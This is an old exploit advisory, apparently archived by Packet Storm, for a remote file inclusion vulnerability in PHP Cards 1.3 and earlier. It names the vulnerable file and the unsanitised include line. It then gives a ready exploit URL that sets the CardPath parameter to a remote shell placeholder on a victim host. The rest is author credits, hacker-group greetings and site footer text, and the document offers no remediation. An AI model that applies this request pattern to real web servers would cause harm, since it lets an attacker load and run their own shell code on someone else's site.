PHP Cards versions 1.3 and prior suffer from a remote file inclusion vulnerability in $CardPath.
b63bcfad55bd6ddd9de5e16d5038b790d1fdadf64063219c7111063008df29a8=====================================================================
# PHP Cards <= 1.3 Remote File Inclue Vulnerability
=====================================================================
# Author : Le CoPrA
=====================================================================
# Download Script : http://www.s3hr.com/PHP Cards 1.3.zip
=====================================================================
# Bug in : phpCards.header.php
# Vuln Code :
include "$CardPath"
=====================================================================
# Exploit :
http://www.victim.com/[path]/phpCards.header.php?CardPath=|SHELL|?
=====================================================================
# Discovered by : Le CoPrA
# ConTaCT : Le.CoPrA |at| Hotmail |dot| CoM
# Special Greetz FlyinG 2 || Str0ke , xoron , mdx ||
# Greetz4// alkasrgolden,LovER BoY, Saudi Hackrz, HACKERS PAL,kOnDoR, Black-Code, CrAsH_oVeR_rIdE, bOhAjEr, Broken-Proxy, simo64
3theaby geer, Mohajer22, Qaher_Yhod, MR.WOLF, cRiMiNaL NeT, al3iznet,Abdullah-00 , egyptghost, ToOoFA,HaKrAwY
# Channel : wWw.TrYaG.cOm/vb || WwW.kOnDoR4.Com/vb || wWw.Q8cracker.com
===========================================================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed